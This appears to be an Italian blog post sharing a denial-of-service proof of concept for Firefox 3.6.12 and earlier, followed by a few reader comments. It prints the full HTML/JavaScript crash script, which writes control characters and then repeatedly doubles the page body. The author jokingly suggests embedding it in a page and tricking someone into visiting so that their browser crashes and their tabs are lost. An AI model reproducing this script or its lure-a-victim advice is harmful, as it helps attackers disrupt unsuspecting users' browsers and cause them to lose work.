0day di Mozilla Firefox 3.6.12


<!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>

Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

Il problema è stato scoperto dal gruppo italiano Backtrack.

, ,

6 risposte a “0day di Mozilla Firefox 3.6.12”

  1. ma va non ci credo!
    Ora provo, vedrai che non funz…………………………………………………………………………………………………….

    • Scherzi a parte ho condotto alcuni test con delle versioni molto più vecchie di firefox ed hanno crashato tutte.

      Presumibilmente la stragrande maggioranza delle installazioni è affetta da questo problerma e la cosa mi sembra molto grave.
      Speriamo non ci siano più gravi implicazioni di sicurezza, come paventato da Luigi.

Rispondi a Fabrizio Vettore Annulla risposta

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *